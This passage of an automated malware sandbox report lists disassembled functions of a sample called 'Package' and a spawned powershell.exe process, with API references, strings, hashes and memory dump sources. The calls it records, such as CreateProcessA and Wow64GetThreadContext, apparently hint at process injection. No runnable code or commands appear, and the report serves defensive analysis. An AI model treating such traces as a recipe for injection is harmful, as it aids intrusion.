Instruction ID: 16530a203a84b065dd8973a6dfa84d3ed65c255eb70949d0f61ab6d941bd80bf
Opcode Fuzzy Hash: 6f08df75f9d9ee66d46de25e8d45dbd59b1d6979858362001606c1b99bfba8a0
Instruction Fuzzy Hash: 78F0303609051DFBDF121FD5DC0999A7F6BFF0ABB1B288414FA1989520C7328861DBB5

Function 00D2D8F0 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

#2294.MFC42U(?,0000009E,?), ref: 00D2D907
#2294.MFC42U(?,00000076,?,?,0000009E,?), ref: 00D2D918
#2294.MFC42U(?,00000077,?,?,00000076,?,?,0000009E,?), ref: 00D2D929
#2294.MFC42U(?,0000007E,?,?,00000077,?,?,00000076,?,?,0000009E,?), ref: 00D2D93A

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #2294
String ID:
API String ID: 314497554-0
Opcode ID: 38d839ec5628c691d1e75c880db02bd680a19cfe716b3d28e5ce9fead809fa45
Instruction ID: 789f076bb4d3774c68d56606ba45c1f536ffd5f8a0539b0d3f8efd1ee2b52ec1
Opcode Fuzzy Hash: 38d839ec5628c691d1e75c880db02bd680a19cfe716b3d28e5ce9fead809fa45
Instruction Fuzzy Hash: 4CF030326086087ADB109B60DC01FAABB5DFB85740F444026BA1C850E1C7B5BD65CEF0

Function 00D30AF0 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

#2294.MFC42U(?,000000A2,?), ref: 00D30B04
#2294.MFC42U(?,000000A6,?,?,000000A2,?), ref: 00D30B18
#2294.MFC42U(?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 00D30B2C
#2294.MFC42U(?,00000070,?,?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 00D30B3D

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #2294
String ID:
API String ID: 314497554-0
Opcode ID: 961d691974a4967dd907121e1fa605c3179baf25f2b816294cbf1f2652f2475c
Instruction ID: 21586a8e69a44d6d62c5c7bbbe1c73bd8f212fcb182f77e98900409cec0eb225
Opcode Fuzzy Hash: 961d691974a4967dd907121e1fa605c3179baf25f2b816294cbf1f2652f2475c
Instruction Fuzzy Hash: AAF0E5722407097EE711AB61DC05FE6BB6DEB41750F404032BA18890E1DBB1ADA5DBF0

Function 00D2CAA0 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

#2294.MFC42U(?,00000093,?), ref: 00D2CAB4
#2294.MFC42U(?,0000008E,?,?,00000093,?), ref: 00D2CAC8
#2293.MFC42U(?,00000080,?,?,0000008E,?,?,00000093,?), ref: 00D2CADC
#2362.MFC42U(?,00000082,?,?,00000080,?,?,0000008E,?,?,00000093,?), ref: 00D2CAF0

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #2294$#2293#2362
String ID:
API String ID: 983985581-0
Opcode ID: da330a662afc8fc8bf956b6e53a61390e624d0649671c4ba55d989809ef528fb
Instruction ID: a4ca28452d19992ce364e688530fd8a2cd76e25e0f01a42c040917fb16bc3922
Opcode Fuzzy Hash: da330a662afc8fc8bf956b6e53a61390e624d0649671c4ba55d989809ef528fb
Instruction Fuzzy Hash: 40F0E5722406097AD7159B51DC41FEABB5DFB40750F408132BA18864E1DBB1AE65DBF0

Function 00D2C620 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

#2294.MFC42U(?,000000A2,?), ref: 00D2C634
#2294.MFC42U(?,000000A6,?,?,000000A2,?), ref: 00D2C648
#2294.MFC42U(?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 00D2C65C
#2294.MFC42U(?,00000070,?,?,00000095,?,?,000000A6,?,?,000000A2,?), ref: 00D2C66D

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #2294
String ID:
API String ID: 314497554-0
Opcode ID: 99eeaa3b270ed1fea4ed126587ffeb075330a1d6fcb3241ea659cc9ab8150847
Instruction ID: 7632f29423f0de71e4b8f08cdf9d0eb9ab5489dc6c10a5fdfc7fb397bafd832c
Opcode Fuzzy Hash: 99eeaa3b270ed1fea4ed126587ffeb075330a1d6fcb3241ea659cc9ab8150847
Instruction Fuzzy Hash: 7BF0E572240709BEE711AB61DC06FA6BB6DEB45750F408032BA18990E1D7B1AD65DBF0

Function 00D3B460 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D3B467
#489.MFC42U(0000008D,00000000,00000008,00D2ED96,00000090), ref: 00D3B478
#567.MFC42U(0000008D,00000000,00000008,00D2ED96,00000090), ref: 00D3B492
#567.MFC42U(0000008D,00000000,00000008,00D2ED96,00000090), ref: 00D3B4AD

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #567$#489H_prolog3
String ID:
API String ID: 3691984168-0
Opcode ID: 45f35857fa5df4c926e141aa98cbdb54a1c9a69ac0cdb0cf452d1e8ab885c391
Instruction ID: e78891e92b5567c313461cf2f0096f6923b915f8a5478404858ae94ebdcb5784
Opcode Fuzzy Hash: 45f35857fa5df4c926e141aa98cbdb54a1c9a69ac0cdb0cf452d1e8ab885c391
Instruction Fuzzy Hash: BFF01C71A0031A9BDB04AF9489463DCBBB0FF54704FA0441DE5847B3C2CBB41A05CBB2

Function 00D3ED80 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 00D3FB48: GetModuleHandleW.KERNEL32(00000000), ref: 00D3FB4F

__set_app_type.MSVCRT ref: 00D3ED92
__p__fmode.MSVCRT ref: 00D3EDA8
__p__commode.MSVCRT ref: 00D3EDB6
__setusermatherr.MSVCRT ref: 00D3EDD7

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: 8c265a07ad23195b4abc41c3211c50ab20a03984ca9c39bd878d67179080bd40
Instruction ID: deb0b003605d83f2a8673101e9e7f3a9f4e74cf9e3241f4a61e068fd473dfee2
Opcode Fuzzy Hash: 8c265a07ad23195b4abc41c3211c50ab20a03984ca9c39bd878d67179080bd40
Instruction Fuzzy Hash: 8BF0F8789013049FC3286F78EC1A6097BA0EB07322F110629F061C63F1CF798581CA70

Function 00D2C920 Relevance: 6.0, APIs: 4, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D2C938
#2634.MFC42U(00000000), ref: 00D2C946
#6195.MFC42U(00D221A0,00000000), ref: 00D2C952
#2634.MFC42U(00000001), ref: 00D2C95B

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #2634$#6195MessageSend
String ID:
API String ID: 2287514142-0
Opcode ID: da7e6adb3626314f2da7c25e323baf532faf2da8d9064a21eb5792c15c610749
Instruction ID: eef371663cccf874cc5c96e4321cea89d576d55d6b95e11d70734fe6b2adbfc4
Opcode Fuzzy Hash: da7e6adb3626314f2da7c25e323baf532faf2da8d9064a21eb5792c15c610749
Instruction Fuzzy Hash: 0DE017313903366BFA3126207C0BFD92B12CB90F55F164064B7086E2D78EA26983D5F5

Function 00D31AC0 Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

#6205.MFC42U(?,00000001,00000001), ref: 00D31AD1
#6205.MFC42U(?,00000001,00000001,?,00000001,00000001), ref: 00D31AE1
#6211.MFC42U(00000001,?,00000001,00000001,?,00000001,00000001), ref: 00D31AE9
#2385.MFC42U(00000001,?,00000001,00000001,?,00000001,00000001), ref: 00D31AF1

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #6205$#2385#6211
String ID:
API String ID: 1216781411-0
Opcode ID: 5713caf9c3b811b2e75ad56558bece082be6afb49d17ac946d6ce935d268ddc7
Instruction ID: e63e1ad37016511f7c95675dbacf6d88256488f897ddf5d21c68e5347a357abc
Opcode Fuzzy Hash: 5713caf9c3b811b2e75ad56558bece082be6afb49d17ac946d6ce935d268ddc7
Instruction Fuzzy Hash: 11E012A5A003186BCF34EBA58CD9DEFB79DFB88344F800429B05AA72C2D9246D0587B0

Function 00D3B37C Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D3B383
#324.MFC42U(00000083,?,00000004,00D32D50,?,23685920), ref: 00D3B395
#540.MFC42U(00000083,?,00000004,00D32D50,?,23685920), ref: 00D3B3A7
#861.MFC42U(00D221A0,00000083,?,00000004,00D32D50,?,23685920), ref: 00D3B3B8

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #324#540#861H_prolog3
String ID:
API String ID: 2127517272-0
Opcode ID: f92a071055589357072a3f0b83641fc6d7978d835f3766dabb30817aef044d6e
Instruction ID: 29fd3cc4175d50dd19f841c6b788dbd4a466e6986105058f45687ab4756cbdf6
Opcode Fuzzy Hash: f92a071055589357072a3f0b83641fc6d7978d835f3766dabb30817aef044d6e
Instruction Fuzzy Hash: E8E04F76A0430AABDB05EBA49842BED7B61FFA4304F104018F240572C2DFF04614D776

Function 00D315C0 Relevance: 6.0, APIs: 4, Instructions: 17COMMON

Download Yara Rule

APIs

#736.MFC42U(?,00D3161D), ref: 00D315D7
#807.MFC42U(?,00D3161D), ref: 00D315E2
#796.MFC42U(?,00D3161D), ref: 00D315ED
#794.MFC42U(?,00D3161D), ref: 00D315F8

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #736#794#796#807
String ID:
API String ID: 2485769241-0
Opcode ID: 23dc1089510ccd4f17a84601aad718cf3e33a253056741276e9e987db124cc9c
Instruction ID: 948b4aaf71afa54a5335718023f045039b749b495b73233522d1471221923a55
Opcode Fuzzy Hash: 23dc1089510ccd4f17a84601aad718cf3e33a253056741276e9e987db124cc9c
Instruction Fuzzy Hash: 4EE0B6311066508BC326EF60E851AD6B3A0EF61310F2145AD94A7072D1DF702A05CBB0

Function 00D2C53F Relevance: 6.0, APIs: 4, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

#693.MFC42U(?,00D2C5BD), ref: 00D2C550
#609.MFC42U(?,00D2C5BD), ref: 00D2C55B
#609.MFC42U(?,00D2C5BD), ref: 00D2C566
#609.MFC42U(?,00D2C5BD), ref: 00D2C56E

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #609$#693
String ID:
API String ID: 2192965535-0
Opcode ID: 4a753daaa9a56cda78490bf96d641c4a25524fe220ba542e3efb51dc0fa62046
Instruction ID: 50f170882787f36858a8d7fa3427f55af452cfa29c45c296703754c6d8a87d58
Opcode Fuzzy Hash: 4a753daaa9a56cda78490bf96d641c4a25524fe220ba542e3efb51dc0fa62046
Instruction Fuzzy Hash: C5D01731080A169BC339EB30E491AEAF392EF54381F61452EB0A7031D1AF606A04CBB0

Function 6E2F3634 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 6E2F3659

Strings

RCC, xrefs: 6E2F3673
MOC, xrefs: 6E2F366B

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 931d87fd20521d2b28765a6a2d3793cb076e2f242a420d642d2883baa8509acc
Instruction ID: 763ad571ba25f86dd4414f2a2589d69e5f47c5f1a7657722354dd9f6de7227d5
Opcode Fuzzy Hash: 931d87fd20521d2b28765a6a2d3793cb076e2f242a420d642d2883baa8509acc
Instruction Fuzzy Hash: AD4137B294020EEBDF06CF94C994AEEBBB6BF48305F144059E914A7220D7359952DB51

Function 00D3D473 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(?,?,00000028,?,?), ref: 00D3D4A1
wsprintfW.USER32 ref: 00D3D4B2

Strings

CLSID\%s\%s, xrefs: 00D3D4AC

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: FromStringwsprintf
String ID: CLSID\%s\%s
API String ID: 1205525775-576494604
Opcode ID: e5b7049e74b61de54cfb0db2cc9c9eb9804c56622a9bca51762fd06dd1c6b3cc
Instruction ID: aaaa5fb4492a167bcd1981084ca3d7d8ceeb7ba21665241273218e8bc1c67501
Opcode Fuzzy Hash: e5b7049e74b61de54cfb0db2cc9c9eb9804c56622a9bca51762fd06dd1c6b3cc
Instruction Fuzzy Hash: B6F0F976A00318AB8B00EF99DD459EF77BDEB86715B104025FD02EB250D675AB0A8BA0

Function 6E2F869E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(6E306FE8), ref: 6E2F86BB

Strings

@p0n, xrefs: 6E2F86C7
o0n, xrefs: 6E2F86AA

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: FreeLibrary
String ID: @p0n$o0n
API String ID: 3664257935-931009579
Opcode ID: be2866feedf5516af3cb640b7a2e5ee971de35edfc7abb190ddf6c4fd70586ed
Instruction ID: b0d388ba868f6d970996ccde84af56851499c98be0305acd6798a9e8a51165e7
Opcode Fuzzy Hash: be2866feedf5516af3cb640b7a2e5ee971de35edfc7abb190ddf6c4fd70586ed
Instruction Fuzzy Hash: 64E07236C6061FCBEB201E8AF400380FBEA4B01337F20121AE5F8120E0D3B088D3CA89

Function 00D2EE70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

#4709.MFC42U ref: 00D2EE75
#6195.MFC42U(System Configuration), ref: 00D2EE81

Strings

System Configuration, xrefs: 00D2EE7A

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #4709#6195
String ID: System Configuration
API String ID: 513596607-3459905039
Opcode ID: 7be1e1329e5e4c87c7c98b21df3ddbd93172d84da467d4b235ac097a30233983
Instruction ID: cccee5301b06a8d97f6248c4f0b817980e801501b442d5c9f72998de1e658074
Opcode Fuzzy Hash: 7be1e1329e5e4c87c7c98b21df3ddbd93172d84da467d4b235ac097a30233983
Instruction Fuzzy Hash: 48B09222A662B42A56B43534380289E024ADAC2626B960576B411A32C1DC98CE0612F0

Function 00D3C5CA Relevance: 5.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00D3C5E5
free.MSVCRT ref: 00D3C5F5
free.MSVCRT ref: 00D3C605
free.MSVCRT ref: 00D3C615

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e01647b0a5888b21e172bfc1dd85bf05ed5d2b697ab94e829c6d447e5cd7b475
Instruction ID: c9144df293f5b2df9a19a9e3cedae3153ac7d2aa0927a58a531b2a72d09fcdd1
Opcode Fuzzy Hash: e01647b0a5888b21e172bfc1dd85bf05ed5d2b697ab94e829c6d447e5cd7b475
Instruction Fuzzy Hash: F3F0F431020B11DFD7392F24E80D7C67BE1EF01722F1A682DE0A6604B19B75A8C5CFA0

Analysis Process: powershell.exePID: 2276, Parent PID: 5468COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	19
Total number of Limit Nodes:	2

Executed Functions

Function 075C2760 Relevance: 10.5, Strings: 8, Instructions: 511
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tP]q, xrefs: 075C2B9D
4']q, xrefs: 075C2812
(o]q, xrefs: 075C2C35
tP]q, xrefs: 075C2BA9
(o]q, xrefs: 075C2C25
4']q, xrefs: 075C29C7
4']q, xrefs: 075C29BB
4']q, xrefs: 075C2806

Memory Dump Source

Source File: 00000008.00000002.2285497445.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_75c0000_powershell.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$4']q$4']q$4']q$4']q$tP]q$tP]q
API String ID: 0-2836991056
Opcode ID: 427728818ebef815f3aeb2de77ffdc10f6231257e0e6879405aae4fcfb8cd246
Instruction ID: 393f88bb4142ae8ec409612b7abca569ffaf41046a1d612d6c6cfb845dde8a31
Opcode Fuzzy Hash: 427728818ebef815f3aeb2de77ffdc10f6231257e0e6879405aae4fcfb8cd246
Instruction Fuzzy Hash: 2302F2B1B042059FCB24CFA9D944BEABBA6FF85710F18C4AFD4058B255DB35D841CBA1

Function 047268D5 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04726B16

Memory Dump Source

Source File: 00000008.00000002.2247593080.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4720000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c33c71e967db7de255ca9b40817e39cf0f60af4f6fa085059337c83450ece5e1
Instruction ID: 1b86af47a390e0da04216a5d87a7f102e46ab3eb182d602b6068bfdff79017c4
Opcode Fuzzy Hash: c33c71e967db7de255ca9b40817e39cf0f60af4f6fa085059337c83450ece5e1
Instruction Fuzzy Hash: 37A16971D006699FEB20DF68C941BEDBBB2BF44314F14816AE848A7340DB74A985CF91

Function 047268E0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04726B16

Memory Dump Source

Source File: 00000008.00000002.2247593080.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4720000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f1dc63344033aaac9b33ac6c53daf23855ce2f2b3df2643b4f2eb1ed18fec5b7
Instruction ID: 6594f5be278f12cb0f51f59c55d772a7f3b1489dbc50c3aedf96a4a14ec931d2
Opcode Fuzzy Hash: f1dc63344033aaac9b33ac6c53daf23855ce2f2b3df2643b4f2eb1ed18fec5b7
Instruction Fuzzy Hash: BF916971D00629DFEF24DF68C940BADBBB2BF48314F14856AE848A7350DB74A985CF91

Function 047264B9 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0472653E

Memory Dump Source

Source File: 00000008.00000002.2247593080.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4720000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: dc46fd455f0412a4d45734fadbd963f31f79d5f71364774bc514b6de2c532eb2
Instruction ID: b121ce32793fd969d30a9d7d7669aa928e934ac5ecee6a657d3a9e6d108a9f53
Opcode Fuzzy Hash: dc46fd455f0412a4d45734fadbd963f31f79d5f71364774bc514b6de2c532eb2
Instruction Fuzzy Hash: 0B216A719002098FDB10DFAAC5857EEBBF4EF49324F20842AD559A7344CB78A585CFA1

Function 047264C0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0472653E

Memory Dump Source

Source File: 00000008.00000002.2247593080.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4720000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b02936996ae48b7dfa1b365febb6aa925143ed87ba7f761359c717bcd247c037
Instruction ID: 530363954b0baf95ceb337b4f6302549a42d422698ec206b5bb835c5311125c2
Opcode Fuzzy Hash: b02936996ae48b7dfa1b365febb6aa925143ed87ba7f761359c717bcd247c037
Instruction Fuzzy Hash: 012118B19002098FDB10DFAAC5857EEBBF4EF48324F14842AD559A7344DB78A945CFA1

Function 075C273F Relevance: 1.3, Strings: 1, Instructions: 79
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 075C2806

Memory Dump Source

Source File: 00000008.00000002.2285497445.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_75c0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: e3342ba03eb45414a27eb86a68e3a5bea62f06ce33f3cc78e46f66fdf09435b6
Instruction ID: 6bea60686baa3b26e82a9e6c6efd063a9d0efaa61df44c140b46d7c4aa885cbe
Opcode Fuzzy Hash: e3342ba03eb45414a27eb86a68e3a5bea62f06ce33f3cc78e46f66fdf09435b6
Instruction Fuzzy Hash: E421A1B1A053428FDB25CBA59A81BE6BBF1BF52650F0980AFD408DB151D334C845CBA2

Function 02E6D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2243098193.0000000002E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2e6d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8de872bf5130bac926e8e2820dc6ecb3b42950cc877b99523613d6d677edbae8
